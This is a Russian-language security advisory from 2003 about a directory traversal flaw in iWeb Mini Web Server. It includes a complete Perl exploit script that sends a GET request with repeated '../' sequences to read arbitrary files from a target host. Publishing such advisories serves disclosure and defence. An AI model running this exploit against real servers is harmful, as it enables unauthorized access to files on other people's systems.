Дата публикации: | 21.04.2003 |
Всего просмотров: | 1508 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость в проверке правильности ввода обнаружена в iWeb Server. Удаленный пользователь может получить файлы на системе, расположенные вне Web директории.
Сообщается, что Web сервер не в состоянии отфильтровать символы обхода каталога (типа '../'). В результате удаленный пользователь может представить специально обработанный запрос, который позволить загрузить произвольные файлы не www root директории с привилегиями процесса web сервера. Эксплоит: #!/usr/bin/perl -w # S e c u r i t y F r e a k s # www.securityfreaks.com # iWeb Mini Web Server Remote Directory Traversal # subversive[at]linuxmail.org - *15/04/2003* use IO::Socket; if(!$ARGV[0]) { print <<"IWEBSUK"; S e c u r i t y F r e a k s www.securityfreaks.com ------------------------------------------------------------- SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal ------------------------------------------------------------- Usage: $0 <host> <file> <port> IWEBSUK exit; else{ $host = $ARGV[0]; } if(!$ARGV[2]) { $port = "80"; else { $port = $ARGV[2]; my $sock = new IO::Socket::INET ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, ); die "\nConnection to $host:$port failed\n" unless $sock; print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n"; while(<$sock>) { print } close($sock); print("\n\n"); exit;Уязвимость обнаружена в iWeb Server prior to the 15th April 2003 at 00:00 GMT/UTC |
Ссылки: | iWeb Mini Web Server Remote Directory Traversal |